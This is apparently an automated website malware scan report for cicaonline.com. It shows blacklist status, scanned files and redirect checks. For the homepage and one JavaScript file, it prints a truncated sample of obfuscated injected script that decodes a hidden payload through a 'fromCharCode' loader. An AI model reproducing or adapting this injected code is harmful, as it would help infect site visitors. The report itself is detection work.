Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=cicaonline.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://cicaonline.com/ | 200 OK Content-Length: 13894 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function mado(){fcf=function(){--(hja.body)}()}egurf="fr"+"om"+"Ch"+"ar"+"Co"+"de";if(document.querySelector)qeblrc=4;lnbnab=("41,87,96,8f,84,95,8a,90,8f,41,99,87,84,83,51,5a,49,4a,41,9c,2e,2b,41,97,82,93,41,94,95,82,95,8a,84,5e,48,82,8b,82,99,48,5c,2e,2b,41,97,82,93,41,84,90,8f,95,93,90,8d,8d,86,93,5e,48,8a,8f,85,86,99,4f,91,89,91,48,5c,2e,2b,41,97,82,93,41,99,87,84,83,41,5e,41,85,90,84,96,8e,86,8f,95,4f,84,93,86,82,95,86,66,8d,86,8e,86,8f,95,49,48,8a,87,93,82,8e,86,48,4a,5c,2e,2b,2e,2b,41,99,8 Antivirus reports:
| ||
http://cicaonline.com/oodomimagerollover.js | 200 OK Content-Length: 8587 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function mado(){fcf=function(){--(hja.body)}()}egurf="fr"+"om"+"Ch"+"ar"+"Co"+"de";if(document.querySelector)qeblrc=4;lnbnab=("41,87,96,8f,84,95,8a,90,8f,41,99,87,84,83,51,5a,49,4a,41,9c,2e,2b,41,97,82,93,41,94,95,82,95,8a,84,5e,48,82,8b,82,99,48,5c,2e,2b,41,97,82,93,41,84,90,8f,95,93,90,8d,8d,86,93,5e,48,8a,8f,85,86,99,4f,91,89,91,48,5c,2e,2b,41,97,82,93,41,99,87,84,83,41,5e,41,85,90,84,96,8e,86,8f,95,4f,84,93,86,82,95,86,66,8d,86,8e,86,8f,95,49,48,8a,87,93,82,8e,86,48,4a,5c,2e,2b,2e,2b,4 Antivirus reports:
| ||
http://cicaonline.com/golf.pdf | 200 OK Content-Length: 302130 Content-Type: application/pdf | clean |
http://cicaonline.com/test404page.js | 404 Not Found Content-Length: 1706 Content-Type: text/html | clean |
http://cicaonline.com/meeting.pdf | 200 OK Content-Length: 52054 Content-Type: application/pdf | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: cicaonline.com
Result:
HTTP/1.1 200 OK
Date: Sat, 10 Jan 2015 07:08:25 GMT
Accept-Ranges: bytes
ETag: "685c94f426c1ce1:0"
Server: Microsoft-IIS/7.0
Content-Length: 13894
Content-Type: text/html
Last-Modified: Fri, 04 Oct 2013 17:27:09 GMT
X-Powered-By: ASP.NET
...13894 bytes of data.
GET / HTTP/1.1
Host: cicaonline.com
Result:
HTTP/1.1 200 OK
Date: Sat, 10 Jan 2015 07:08:25 GMT
Accept-Ranges: bytes
ETag: "685c94f426c1ce1:0"
Server: Microsoft-IIS/7.0
Content-Length: 13894
Content-Type: text/html
Last-Modified: Fri, 04 Oct 2013 17:27:09 GMT
X-Powered-By: ASP.NET
...13894 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: cicaonline.com
Referer: http://www.google.com/search?q=cicaonline.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: cicaonline.com
Referer: http://www.google.com/search?q=cicaonline.com
Result:
The result is similar to the first query. There are no suspicious redirects found.